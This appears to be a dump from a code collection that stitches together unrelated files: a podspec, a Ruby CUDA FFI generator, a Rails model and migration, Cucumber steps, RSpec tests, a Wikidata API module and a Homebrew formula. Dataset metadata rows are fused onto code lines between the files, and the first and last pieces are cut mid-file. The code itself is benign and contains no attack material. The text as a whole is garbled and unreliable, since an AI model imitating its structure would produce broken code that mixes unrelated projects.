spec.ios.source_files = 'Sources/Contentful/UIKit/*.swift'
spec.watchos.source_files = 'Sources/Contentful/UIKit/*.swift'
spec.tvos.source_files = 'Sources/Contentful/UIKit/*.swift'
spec.osx.source_files = 'Sources/Contentful/AppKit/*.swift'
spec.ios.deployment_target = '8.0'
spec.osx.deployment_target = '10.10'
spec.watchos.deployment_target = '2.0'
spec.tvos.deployment_target = '9.0'
# Subspecs
spec.subspec 'ImageOptions' do |subspec|
subspec.source_files = 'Sources/Contentful/ImageOptions.swift'
end
end
| 33 | 101 | 0.632231 |
1c2e0d76d73b48666d3b306b611b6cacecba9d0f | 5,131 | require_relative 'cuda_model'
require_relative 'gen_probe_base.rb'
# Flattened views over the parsed CUDA API description ($cuda_api is loaded
# by the cuda_model require above).
$all_types = $cuda_api["typedefs"]
$all_structs = $cuda_api["structs"]
$all_unions = $cuda_api["unions"]
$all_enums = $cuda_api["enums"]
$all_funcs = $cuda_api["functions"]
# Name buckets populated by the classification pass further down the file.
$all_enum_names = []
$all_bitfield_names = []
$all_struct_names = []
$all_union_names = []
# Typedef names that behave as opaque handles: pointers to structs, plus
# typedefs of the types listed in CUDA_OBJECTS.
$objects = $all_types.select { |t|
  t.type.kind_of?(YAMLCAst::Pointer) &&
  t.type.type.kind_of?(YAMLCAst::Struct)
}.collect { |t| t.name }
$all_types.each { |t|
  if t.type.kind_of?(YAMLCAst::CustomType) && CUDA_OBJECTS.include?(t.type.name)
    $objects.push t.name
  end
}
# Map of typedef name -> underlying CUDA integer scalar type name.
$int_scalars = {}
$all_types.each { |t|
  if t.type.kind_of?(YAMLCAst::CustomType) && CUDA_INT_SCALARS.include?(t.type.name)
    $int_scalars[t.name] = t.type.name
  end
}
# Converts a camel-cased identifier to snake case by prefixing every run of
# uppercase letters/digits with an underscore, then downcasing the result.
# Note the leading underscore this produces for identifiers that begin with
# an uppercase letter (e.g. "FooBar" -> "_foo_bar"); callers strip it.
def to_snake_case(str)
  str.gsub(/([A-Z][A-Z0-9]*)/) { "_#{Regexp.last_match(1)}" }.downcase
end
# Maps a raw CUDA identifier to the Ruby class name used in the generated
# bindings: strips a trailing "_t" and the namespace prefix, camel-cases the
# underscore-separated words, fixes acronym casing, and re-attaches the
# namespace prefix. Two irregular names are special-cased up front.
def to_class_name(name)
  special_cases = {
    "CUstreamBatchMemOpType"   => "CUStreamBatchMemOpType",
    "CUstreamBatchMemOpParams" => "CUStreamBatchMemOpParams",
  }
  special = special_cases[name]
  return special if special

  prefix = to_name_space(name) || ""
  camel = name
    .gsub(/_t\z/, "")
    .gsub(/\A#{prefix}/, "")
    .split("_")
    .map(&:capitalize)
    .join
  camel = camel.gsub("Uuid", "UUID").gsub("Ipc", "IPC").gsub("P2p", "P2P")
  prefix + camel
end
# Maps a C type name to the *source text* of a Ruby FFI type symbol, e.g.
# "unsigned int" -> ":uint" or "CUdevice_attribute" -> ":cu_device_attribute".
# Returns a String containing a symbol literal (note the .inspect at the end),
# because the result is interpolated into generated code.
def to_ffi_name(name)
  # Primitive C types and fixed-width CUDA scalars map directly.
  case name
  when nil
    return ":anonymous"
  when "unsigned int"
    return ":uint"
  when "unsigned short"
    return ":ushort"
  when "unsigned char"
    return ":uchar"
  when "unsigned long long int"
    return ":uint64"
  when "size_t"
    return ":size_t"
  when "cuuint64_t"
    return ":cuuint64_t"
  when "cuuint32_t"
    return ":cuuint32_t"
  end
  # Everything else: class-name form, minus the namespace prefix, snake-cased,
  # then re-prefixed with the lower-cased namespace ("cu_"/"cuda_").
  n = to_class_name(name)
  mod = to_name_space(name)
  if mod
    n = n.gsub(/\A#{mod}/, "")
    # `mod` is a fresh string returned by to_name_space, so the in-place
    # mutation below does not alias anything outside this method.
    mod << "_"
    mod.downcase!
  else
    mod = ""
  end
  # Strip the leading underscore(s) produced by to_snake_case.
  n = to_snake_case(n).gsub(/\A_+/, "")
  mod << n
  mod.to_sym.inspect
end
# Returns the CUDA namespace prefix of an identifier: "CUDA" (checked first,
# since it is the longer prefix), "CU", or nil when the name has neither.
def to_name_space(name)
  if name.start_with?("CUDA")
    "CUDA"
  elsif name.start_with?("CU")
    "CU"
  end
end
# Classify every typedef by the kind of its underlying type, filling the
# $all_enum_names / $all_struct_names / $all_union_names buckets.
$all_types.each { |t|
  if t.type.kind_of? YAMLCAst::Enum
    # NOTE(review): `enum` is looked up but never used, and the `if false`
    # below permanently disables the bitfield branch, so every enum typedef
    # lands in $all_enum_names. This looks like a stubbed-out heuristic for
    # detecting bitfield-style enums — confirm intent before "fixing" it.
    enum = $all_enums.find { |e| t.type.name == e.name }
    if false
      $all_bitfield_names.push t.name
    else
      $all_enum_names.push t.name
    end
  elsif t.type.kind_of? YAMLCAst::Struct
    $all_struct_names.push t.name
  elsif t.type.kind_of? YAMLCAst::Union
    $all_union_names.push t.name
  end
}
# Reopens the YAMLCAst node classes (presumably defined by the files required
# at the top — Pointer/CustomType are already referenced above) to add a
# #to_ffi serializer per node kind. Each #to_ffi returns strings/arrays of
# *source text* that is later interpolated into generated FFI binding code.
module YAMLCAst
  class Struct
    # Returns [member_name_symbol_literal, ffi_type_source] pairs, suitable
    # for splicing into an FFI `layout` call.
    def to_ffi
      res = []
      members.each { |m|
        # Bare `Array`/`Pointer`/`Struct`/`Union` below resolve to the
        # YAMLCAst classes (this module's scope), not to ::Array etc.
        mt = case m.type
        when Array
          m.type.to_ffi
        when Pointer
          ":pointer"
        else
          if !m.type.name
            # Anonymous nested struct/union: emit an inline anonymous FFI
            # class. print_lambda renders one [name, type] pair; note its
            # block param deliberately shadows the outer `m`.
            print_lambda = lambda { |m|
              s = "#{m[0]}, "
              if m[1].kind_of?(::Array)
                s << "[ #{m[1][0]}, #{m[1][1]} ]"
              else
                s << "#{m[1]}"
              end
              s
            }
            case m.type
            when Struct
              membs = m.type.to_ffi
              "(Class::new(FFI::CUDAStruct) { layout #{membs.collect(&print_lambda).join(", ")} }.by_value)"
            when Union
              membs = m.type.to_ffi
              "(Class::new(FFI::CUDAUnion) { layout #{membs.collect(&print_lambda).join(", ")} }.by_value)"
            else
              raise "Error type unknown!"
            end
          else
            to_ffi_name(m.type.name)
          end
        end
        res.push [m.name.to_sym.inspect, mt]
      }
      res
    end
  end
  class Union
    # Same shape as Struct#to_ffi (the two bodies are intentionally parallel).
    def to_ffi
      res = []
      members.each { |m|
        mt = case m.type
        when Array
          m.type.to_ffi
        when Pointer
          ":pointer"
        else
          if !m.type.name
            print_lambda = lambda { |m|
              s = "#{m[0]}, "
              if m[1].kind_of?(::Array)
                s << "[ #{m[1][0]}, #{m[1][1]} ]"
              else
                s << "#{m[1]}"
              end
              s
            }
            case m.type
            when Struct
              membs = m.type.to_ffi
              "(Class::new(FFI::CUDAStruct) { layout #{membs.collect(&print_lambda).join(", ")} }.by_value)"
            when Union
              membs = m.type.to_ffi
              "(Class::new(FFI::CUDAUnion) { layout #{membs.collect(&print_lambda).join(", ")} }.by_value)"
            else
              raise "Error type unknown!"
            end
          else
            to_ffi_name(m.type.name)
          end
        end
        res.push [m.name.to_sym.inspect, mt]
      }
      res
    end
  end
  class Array
    # Fixed-size array member: [element_type_source, length].
    def to_ffi
      t = case type
      when Pointer
        ":pointer"
      else
        to_ffi_name(type.name)
      end
      [ t, length ]
    end
  end
  class Function
    # Function signature: [return_type_source, [param_type_source, ...]].
    # Pointer params to known structs become "<Class>.ptr" so the generated
    # binding gets typed struct pointers instead of a bare :pointer.
    def to_ffi
      t = to_ffi_name(type.name)
      p = params.collect { |par|
        if par.type.kind_of?(Pointer)
          if par.type.type.respond_to?(:name) &&
             $all_struct_names.include?(par.type.type.name)
            "#{to_class_name(par.type.type.name)}.ptr"
          else
            ":pointer"
          end
        else
          to_ffi_name(par.type.name)
        end
      }
      [t, p]
    end
  end
end
| 23.217195 | 108 | 0.53284 |
2685d0a945dc5cea537d74be73ef98dda247ecf4 | 1,260 | class Workflow < ApplicationRecord
  # NOTE: the hexsha/size columns fused onto the line above are
  # dataset-extraction residue, not part of the original Ruby source.
  # A user-owned workflow composed of ordered modules, with polymorphic tags
  # and feedback (ratings + comments).
  has_many :taggings, as: :taggable, dependent: :destroy
  has_many :tags, through: :taggings
  belongs_to :user
  # Join rows carry a `position`; modules are always returned in order.
  has_many(
    :workflow_modules,
    -> { order(:position) },
    inverse_of: :workflow,
    dependent: :destroy,
  )
  accepts_nested_attributes_for :workflow_modules
  # Include modules regardless of their default `visible` scoping.
  has_many(
    :zoon_modules,
    -> { unscope(where: :visible) },
    through: :workflow_modules,
  )
  has_many :feedbacks,
    -> {
      order('updated_at DESC').extending(Feedback::Upserter)
    },
    as: :feedbackable,
    dependent: :destroy
  # `comments` is presumably a scope on Feedback selecting comment-type rows
  # — verify in the Feedback model.
  has_many :comments,
    -> { comments },
    as: :feedbackable,
    class_name: 'Feedback'
  FAMILIES = ["occurrence", "covariate", "process", "model", "output"]
  # Defines e.g. `occurrence_composition_type` with values list/chain/replicate
  # and suffixed predicates (`list_occurrence_composition_type?`, ...).
  FAMILIES.each do |family|
    enum "#{family}_composition_type" => {
      list: 0,
      chain: 1,
      replicate: 2,
    }, _suffix: true
  end
  # generate_search_scope is an app-level helper — builds a text search over
  # title/description.
  scope :search, generate_search_scope(:workflows, ['title', 'description'])
  # Hash of family name -> current composition type, e.g. {"model" => "chain"}.
  def composition_types
    FAMILIES.map do |family|
      [family, send("#{family}_composition_type")]
    end.to_h
  end
  # 0.0 when there are no ratings (nil.to_f).
  def average_rating
    feedbacks.average(:rating).to_f
  end
  def rating_count
    feedbacks.count
  end
  def comment_count
    feedbacks.comments.count
  end
end
| 20.322581 | 76 | 0.655556 |
4afb18dcb622659ba13ec7f0e5d952039f563e57 | 2,435 |
# Polls every 3 seconds until the given text appears on the page; fails with
# a descriptive message after DEFAULT_TIMEOUT seconds.
When(/^I wait until I see "([^"]*)" text$/) do |text|
  begin
    Timeout.timeout(DEFAULT_TIMEOUT) do
      sleep 3 until page.has_content?(text)
    end
  rescue Timeout::Error
    raise "Couldn't find the #{text} in webpage"
  end
end
# Like the step above, but reloads the page between 1-second polls so
# server-side changes become visible.
When(/^I wait until I see "([^"]*)" text, refreshing the page$/) do |text|
  begin
    Timeout.timeout(DEFAULT_TIMEOUT) do
      until page.has_content?(text)
        sleep 1
        page.evaluate_script 'window.location.reload()'
      end
    end
  rescue Timeout::Error
    raise "Couldn't find the #{text} in webpage"
  end
end
# Waits (reloading every 3 seconds) until the text disappears from the page.
When(/^I wait until I do not see "([^"]*)" text, refreshing the page$/) do |text|
  begin
    Timeout.timeout(DEFAULT_TIMEOUT) do
      while page.has_content?(text)
        sleep 3
        page.evaluate_script 'window.location.reload()'
      end
    end
  rescue Timeout::Error
    raise "The #{text} was always there in webpage"
  end
end
#
# Toggle a checkbox identified by id, name, or label text.
#
When(/^I check "([^"]*)"$/) do |checkbox_id|
  check checkbox_id
end
When(/^I uncheck "([^"]*)"$/) do |checkbox_id|
  uncheck checkbox_id
end
#
# Click the first button matching the label; retry once after 4 seconds if the
# first attempt raises (e.g. the element is not yet rendered).
#
When(/^I click on "([^"]*)"$/) do |label|
  attempts = 0
  begin
    click_button label, match: :first
  rescue StandardError
    attempts += 1
    raise if attempts > 1
    sleep 4
    retry
  end
end
#
# Click on a button and confirm in alert box
# Delegates to the "I click on" step inside Capybara's accept_alert wrapper;
# the trailing sleep gives the alert time to be dismissed before the block
# exits.
When(/^I click on "([^"]*)" and confirm$/) do |button|
  accept_alert do
    step %(I click on "#{button}")
    sleep 1
  end
end
#
# Click a link by its text; retry once after 3 seconds on failure.
#
When(/^I follow "([^"]*)"$/) do |text|
  attempts = 0
  begin
    click_link text
  rescue StandardError
    attempts += 1
    raise if attempts > 1
    sleep 3
    retry
  end
end
#
# Click the first link matching the given text.
#
When(/^I follow first "([^"]*)"$/) do |link_text|
  click_link link_text, match: :first
end
# FIXME: this step need adaption
# Logs in through the web form with the captured credentials.
Given(/^I am authorized as "([^"]*)" with password "([^"]*)"$/) do |user, pwd|
  # visit webpage login
  visit Capybara.app_host
  fill_in 'username', with: user
  # BUGFIX: previously referenced undefined `arg2` (the block param is `pwd`),
  # which raised NameError whenever this step ran.
  fill_in 'password', with: pwd
  click_button 'Sign In'
  step %(I should be logged in)
end
#
# Assert the text is present anywhere on the page, allowing one 2-second
# grace period before failing.
#
Then(/^I should see a "([^"]*)" text$/) do |expected|
  next if page.has_content?(expected)
  sleep 2
  raise unless page.has_content?(expected)
end
#
# Assert the text is absent from the page (has_no_content? uses Capybara's
# waiting behaviour, so this tolerates the text disappearing shortly).
#
Then(/^I should not see a "([^"]*)" text$/) do |forbidden|
  page.has_no_content?(forbidden) || raise("#{forbidden} found on the page! FAIL")
end
| 19.48 | 81 | 0.615606 |
39433ebc1228eccb7ae08311811bf50f17b328f3 | 6,206 | # -*- encoding: utf-8 -*-
require_relative 'spec_helper'
describe Message do
describe 'providing an evaluted message that is not a string' do
let(:subject) { Message.new(ndc: [], message: Rational(1.5)) }
it 'returns the given message' do
assert_equal '3/2', subject.to_s
end
end
describe 'providing an evaluted message' do
let(:subject) { Message.new(ndc: [], message: 'Evaluated') }
it 'returns the given message' do
assert_equal 'Evaluated', subject.to_s
end
end
describe 'providing a block message that does not return a string' do
let(:subject) do
Message.new(ndc: []) do
Rational(1.5)
end
end
it 'returns the result of evaluating the block and calling #to_s on the result' do
assert_equal '3/2', subject.to_s
end
end
describe 'providing a block message' do
let(:subject) do
@evaluated = 0
Message.new(ndc: []) do
@evaluated += 1
'Block'
end
end
it 'returns the result of evaluating the block' do
assert_equal 'Block', subject.to_s
end
it 'only evaluates the block once for multiple calls' do
subject.to_s
subject.to_s
assert_equal 1, @evaluated
end
end
describe 'providing both an evaluated and block message' do
let(:subject) do
Message.new(ndc: [], message: 'Evaluated') do
'Block'
end
end
it 'returns the result of evaluating the block' do
assert_equal 'Block', subject.to_s
end
end
describe 'supporting the old constructor format' do
describe 'providing an evaluted message' do
let(:subject) { Message.new('Evaluated') }
it 'returns the given message' do
assert_equal 'Evaluated', subject.to_s
end
end
describe 'providing a block message' do
let(:subject) do
@evaluated = 0
Message.new do
@evaluated += 1
'Block'
end
end
it 'returns the result of evaluating the block' do
assert_equal 'Block', subject.to_s
end
it 'only evaluates the block once for multiple calls' do
subject.to_s
subject.to_s
assert_equal 1, @evaluated
end
end
describe 'providing both an evaluated and block message' do
let(:subject) do
Message.new('Evaluated') do
'Block'
end
end
it 'returns the result of evaluating the block' do
assert_equal 'Block', subject.to_s
end
end
end
describe 'filtering backtraces' do
def generate_error
raise 'Example failure'
rescue => e
e
end
let(:dirname) { File.dirname(__FILE__) }
let(:error) { generate_error }
let(:subject) do
Message.new(error: generate_error, backtrace_filters: backtrace_filters)
end
require 'rbconfig'
describe 'string keys' do
let(:backtrace_filters) do
{
dirname => '$DIRNAME',
RbConfig::CONFIG['rubylibdir'] => '$RUBYLIBDIR',
}
end
it 'replaces the matching keys' do
backtrace = subject.error.backtrace
backtrace_filters.each do |prefix, replacement|
refute backtrace.find { |line| line.start_with? prefix }, "Backtrace should not have a line starting '#{prefix}'\n\t#{backtrace.join("\n\t")}"
end
end
end
describe 'array keys' do
let(:backtrace_filters) do
{
[dirname, RbConfig::CONFIG['rubylibdir']] => '$REPLACEMENT',
}
end
it 'replaces the matching keys' do
backtrace = subject.error.backtrace
backtrace_filters.each do |prefixes, replacement|
prefixes.each do |prefix|
refute backtrace.find { |line| line.start_with? prefix }, "Backtrace should not have a line starting '#{prefix}'\n\t#{backtrace.join("\n\t")}"
end
end
end
end
describe 'class' do
let(:backtrace_filters) { Hash.new }
it 'returns the class of the error' do
assert_equal subject.error.class, RuntimeError
end
end
end
describe 'filtering backtraces' do
class TestOnlyException < StandardError; end
def generate_error
Invisible.raise_alarm
rescue TestOnlyException => e
e
end
class Invisible
def self.raise_alarm
raise TestOnlyException, 'Example failure'
end
end
let(:dirname) { File.dirname(__FILE__) }
let(:error) { generate_error }
let(:subject) do
Message.new(error: generate_error, backtrace_silencers: backtrace_silencers)
end
require 'rbconfig'
describe 'regex values' do
let(:backtrace_silencers) do
[
/invisible/i
]
end
it 'removes lines matching the keys' do
backtrace = subject.error.backtrace
backtrace_silencers.each do |silencer_regex|
refute backtrace.find { |line| line.match? silencer_regex }, "Backtrace should not have a line starting '#{silencer_regex}'\n\t#{backtrace.join("\n\t")}"
end
end
end
describe 'string values' do
let(:backtrace_silencers) do
[
"Invisible"
]
end
it 'removes lines matching the keys' do
backtrace = subject.error.backtrace
backtrace_silencers.each do |silencer_string|
refute backtrace.find { |line| line.include? silencer_string }, "Backtrace should not have a line starting '#{silencer_string}'\n\t#{backtrace.join("\n\t")}"
end
end
end
end
# Opt-in micro-benchmarks; only defined when BENCH is set in the environment.
if ENV["BENCH"]
  describe 'benchmarks' do
    let(:subject) { Message.new(ndc: [], message: 'Evaluated') }
    it 'invoking to_s once' do
      started_at = Time.now
      50_000.times { subject.to_s }
      took = Time.now - started_at
      puts "\nMessages took #{took} to generate\n"
    end
    it 'invoking to_s four times' do
      started_at = Time.now
      50_000.times do
        4.times { subject.to_s }
      end
      took = Time.now - started_at
      puts "\nMessages took #{took} to generate\n"
    end
  end
end
end
| 24.14786 | 167 | 0.610055 |
edb5899ab9dccb4cf3425f2918b83f2e03902c1a | 283 | module ExceptionList
  # NOTE: the hexsha/size columns fused onto the line above are
  # dataset-extraction residue, not part of the original Ruby source.
  # Transport-level failures raised while resolving/connecting to a URI.
  URI_EXCEPTIONS = [Errno::ETIMEDOUT, Errno::ECONNREFUSED, URI::InvalidURIError, Net::OpenTimeout, SocketError].freeze
  # HTTP-level failures surfaced by the rest-client gem.
  REST_CLIENT_EXCEPTIONS = [RestClient::NotFound, RestClient::GatewayTimeout, RestClient::BadRequest, RestClient::MethodNotAllowed].freeze
end
| 56.6 | 138 | 0.819788 |
87016835b7e0b19af0b801cb100caa70af248a7d | 3,891 | # frozen_string_literal: true
module Reality::Describers::Wikidata::Impl
  module Modules
    # Enumerate pages that contain a given URL.
    #
    # The "submodule" (MediaWiki API term) is included in action after setting some param, providing
    # additional tweaking for this param. Example (for {Reality::Describers::Wikidata::Impl::Actions::Query} and
    # its submodules):
    #
    # ```ruby
    # api.query # returns Actions::Query
    # .prop(:revisions) # adds prop=revisions to action URL, and includes Modules::Revisions into action
    # .limit(10) # method of Modules::Revisions, adds rvlimit=10 to URL
    # ```
    #
    # All submodule's parameters are documented as its public methods, see below.
    #
    module Exturlusage
      # Which pieces of information to include:
      #
      # @param values [Array<String>] Allowed values: "ids" (Adds the ID of page), "title" (Adds the title and namespace ID of the page), "url" (Adds the URL used in the page).
      # @return [self]
      def prop(*values)
        values.inject(self) { |res, val| res._prop(val) or fail ArgumentError, "Unknown value for prop: #{val}" }
      end

      # @private
      # The `defined?(super) && super || ...` pattern lets another included
      # module accept the value first; otherwise it is validated here and
      # merged into the request params.
      def _prop(value)
        defined?(super) && super || ["ids", "title", "url"].include?(value.to_s) && merge(euprop: value.to_s, replace: false)
      end

      # When more results are available, use this to continue.
      #
      # @param value [Integer]
      # @return [self]
      def offset(value)
        merge(euoffset: value.to_s)
      end

      # Protocol of the URL. If empty and euquery is set, the protocol is http. Leave both this and euquery empty to list all external links.
      #
      # @param value [String] One of "bitcoin", "ftp", "ftps", "geo", "git", "gopher", "http", "https", "irc", "ircs", "magnet", "mailto", "mms", "news", "nntp", "redis", "sftp", "sip", "sips", "sms", "ssh", "svn", "tel", "telnet", "urn", "worldwind", "xmpp".
      # @return [self]
      def protocol(value)
        _protocol(value) or fail ArgumentError, "Unknown value for protocol: #{value}"
      end

      # @private
      def _protocol(value)
        defined?(super) && super || ["bitcoin", "ftp", "ftps", "geo", "git", "gopher", "http", "https", "irc", "ircs", "magnet", "mailto", "mms", "news", "nntp", "redis", "sftp", "sip", "sips", "sms", "ssh", "svn", "tel", "telnet", "urn", "worldwind", "xmpp"].include?(value.to_s) && merge(euprotocol: value.to_s)
      end

      # Search string without protocol. See Special:LinkSearch. Leave empty to list all external links.
      #
      # @param value [String]
      # @return [self]
      def query(value)
        merge(euquery: value.to_s)
      end

      # The page namespaces to enumerate.
      #
      # @param values [Array<String>] Allowed values: "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15", "120", "121", "122", "123", "828", "829", "1198", "1199", "2300", "2301", "2302", "2303", "2600".
      # @return [self]
      def namespace(*values)
        values.inject(self) { |res, val| res._namespace(val) or fail ArgumentError, "Unknown value for namespace: #{val}" }
      end

      # @private
      def _namespace(value)
        defined?(super) && super || ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "12", "13", "14", "15", "120", "121", "122", "123", "828", "829", "1198", "1199", "2300", "2301", "2302", "2303", "2600"].include?(value.to_s) && merge(eunamespace: value.to_s, replace: false)
      end

      # How many pages to return.
      #
      # @param value [Integer, "max"]
      # @return [self]
      def limit(value)
        merge(eulimit: value.to_s)
      end

      # Expand protocol-relative URLs with the canonical protocol.
      #
      # @return [self]
      def expandurl()
        merge(euexpandurl: 'true')
      end
    end
  end
end
| 41.83871 | 313 | 0.579029 |
7995d383986393a3e9b67a14f49639b2c4f747fc | 434 | class CreateChatTeams < ActiveRecord::Migration
  # NOTE: the hexsha/size columns fused onto the line above are
  # dataset-extraction residue, not part of the original Ruby source.
  include Gitlab::Database::MigrationHelpers
  DOWNTIME = true
  DOWNTIME_REASON = "Adding a foreign key"
  # Foreign keys cannot be added inside a transaction on this setup.
  disable_ddl_transaction!
  def change
    # One chat team per namespace; deleting the namespace cascades here.
    create_table :chat_teams do |t|
      t.references :namespace, null: false, index: { unique: true }, foreign_key: { on_delete: :cascade }
      t.string :team_id
      t.string :name
      t.timestamps null: false
    end
  end
end
| 22.842105 | 105 | 0.700461 |
1d97f90f7a41cb88e8a3bb94ff7f5d915c3e948c | 1,414 | describe EdoOracle::SubjectAreas do
subject { described_class.fetch }
before do
allow(EdoOracle::Queries).to receive(:get_subject_areas).and_return subject_areas.map { |area| {'subjectarea' => area} }
end
context 'a variety of subject areas' do
let(:subject_areas) { ['ARABIC', 'COM LIT', 'ENE,RES', 'ENGLISH', 'L & S', 'XL&S'] }
it 'provides decompressions' do
expect(subject.decompress 'COMLIT').to eq 'COM LIT'
expect(subject.decompress 'ENERES').to eq 'ENE,RES'
expect(subject.decompress 'LS').to eq 'L & S'
expect(subject.decompress 'XLS').to eq 'XL&S'
end
it 'allows no-op decompressions to pass through' do
expect(subject.decompress 'COM LIT').to eq 'COM LIT'
expect(subject.decompress 'ENGLISH').to eq 'ENGLISH'
expect(subject.decompress 'L & S').to eq 'L & S'
end
it 'returns original value when decompression unavailable' do
expect(subject.decompress 'STUDIES').to eq 'STUDIES'
end
end
context 'multiple decompressions available' do
let(:subject_areas) { ['L&S', 'L & S', 'LATAMST', 'PHYS ED', 'PHYSED', 'PHYSIOL'] }
it 'prefers the longest available' do
expect(subject.decompress 'LS').to eq 'L & S'
expect(subject.decompress 'PHYSED').to eq 'PHYS ED'
end
it 'transforms a partial to a full decompression' do
expect(subject.decompress 'L&S').to eq 'L & S'
end
end
end
| 38.216216 | 124 | 0.660537 |
613c767ae587992ccdd5df85ae56494e76219d11 | 134 | class Sfn::HasSatisfaction
  # NOTE: the hexsha/size columns fused onto the line above are
  # dataset-extraction residue, not part of the original Ruby source.
  # Simple immutable wrapper exposing the satisfaction value it was built with.
  attr_reader :satisfaction
  def initialize(satisfaction)
    @satisfaction = satisfaction
  end
end
1cbc16348b302dbd3dfc864d03e37afd618b1bd | 2,860 | class QtPerconaServer < Formula
  # NOTE: the hexsha/size columns fused onto the line above are
  # dataset-extraction residue, not part of the original Ruby source.
  # Homebrew formula building only Qt's MySQL SQL driver, linked against
  # percona-server's client library.
  desc "Qt SQL Database Driver"
  homepage "https://www.qt.io/"
  url "https://download.qt.io/official_releases/qt/6.1/6.1.3/submodules/qtbase-everywhere-src-6.1.3.tar.xz"
  sha256 "1e9abb2ea4daa0fd11f46fc871d9e896b916e1b7130fed74c83d66221bb4fe78"
  license all_of: ["LGPL-2.1-only", "LGPL-3.0-only"]
  livecheck do
    formula "qt"
  end
  bottle do
    sha256 cellar: :any, arm64_big_sur: "8bf3ea2a32d66415dd802813ea09fa15ac9eeab75b5d4e49effcad08ab3771a5"
    sha256 cellar: :any, big_sur:       "7228edab478768ef2398b4f1c9d36f075d95e932f7083f1b5b5deecc98c966e2"
    sha256 cellar: :any, catalina:      "fd84ae9e43efc6844a7ce0895f4060465444f48dbcb903fb1129c26ca634c497"
    sha256 cellar: :any, mojave:        "1b4d4e64aa2e52436873b7c71a3f2f5202b0b6285f96a1776d2c701385ccc8b7"
  end
  depends_on "cmake" => [:build, :test]
  depends_on "pkg-config" => :build
  depends_on "percona-server"
  depends_on "qt"
  conflicts_with "qt-mysql", "qt-mariadb",
    because: "qt-mysql, qt-mariadb, and qt-percona-server install the same binaries"
  def install
    # Enable only the MySQL driver; all other SQL backends are switched off.
    args = std_cmake_args + %W[
      -DCMAKE_STAGING_PREFIX=#{prefix}
      -DFEATURE_sql_ibase=OFF
      -DFEATURE_sql_mysql=ON
      -DFEATURE_sql_oci=OFF
      -DFEATURE_sql_odbc=OFF
      -DFEATURE_sql_psql=OFF
      -DFEATURE_sql_sqlite=OFF
      -DMySQL_LIBRARY=#{Formula["percona-server"].opt_lib}/#{shared_library("libperconaserverclient")}
    ]
    # Only the sqldrivers plugin subtree is configured and built.
    cd "src/plugins/sqldrivers" do
      system "cmake", "-S", ".", "-B", "build", *args
      system "cmake", "--build", "build"
      system "cmake", "--install", "build"
    end
  end
  test do
    # Build a minimal Qt app twice (CMake and qmake) that loads the QMYSQL
    # driver and asserts the database handle is valid.
    (testpath/"CMakeLists.txt").write <<~EOS
      cmake_minimum_required(VERSION 3.16.0)
      project(test VERSION 1.0.0 LANGUAGES CXX)
      set(CMAKE_CXX_STANDARD 17)
      set(CMAKE_CXX_STANDARD_REQUIRED ON)
      set(CMAKE_AUTOMOC ON)
      set(CMAKE_AUTORCC ON)
      set(CMAKE_AUTOUIC ON)
      find_package(Qt6 COMPONENTS Core Sql REQUIRED)
      add_executable(test
        main.cpp
      )
      target_link_libraries(test PRIVATE Qt6::Core Qt6::Sql)
    EOS
    (testpath/"test.pro").write <<~EOS
      QT += core sql
      QT -= gui
      TARGET = test
      CONFIG += console
      CONFIG -= app_bundle
      TEMPLATE = app
      SOURCES += main.cpp
    EOS
    (testpath/"main.cpp").write <<~EOS
      #include <QCoreApplication>
      #include <QtSql>
      #include <cassert>
      int main(int argc, char *argv[])
      {
        QCoreApplication a(argc, argv);
        QSqlDatabase db = QSqlDatabase::addDatabase("QMYSQL");
        assert(db.isValid());
        return 0;
      }
    EOS
    system "cmake", "-DCMAKE_BUILD_TYPE=Debug", testpath
    system "make"
    system "./test"
    ENV.delete "CPATH"
    system "qmake"
    system "make"
    system "./test"
  end
end
| 29.183673 | 107 | 0.661189 |
26b2edd1eb08193df64f776691229f9d80c8dff5 | 5,128 | #
# Be sure to run `pod spec lint ZWSProgressHUD.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "ZWSProgressHUD"
s.version = "0.0.2"
s.summary = "ZWSProgressHUD from MBProgressHUD"
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
ZWSProgressHUD from MBProgressHUD create by zheng.
DESC
s.homepage = "https://github.com/zhengweishu/ZWSProgressHUD"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = "MIT"
# s.license = { :type => "MIT", :file => "FILE_LICENSE" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "zhengweishu" => "[email protected]" }
# Or just: s.author = "zhengweishu"
# s.authors = { "zhengweishu" => "[email protected]" }
# s.social_media_url = "http://twitter.com/zhengweishu"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
# s.platform = :ios
# s.platform = :ios, "5.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "https://github.com/zhengweishu/ZWSProgressHUD.git", :tag => "0.0.2" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
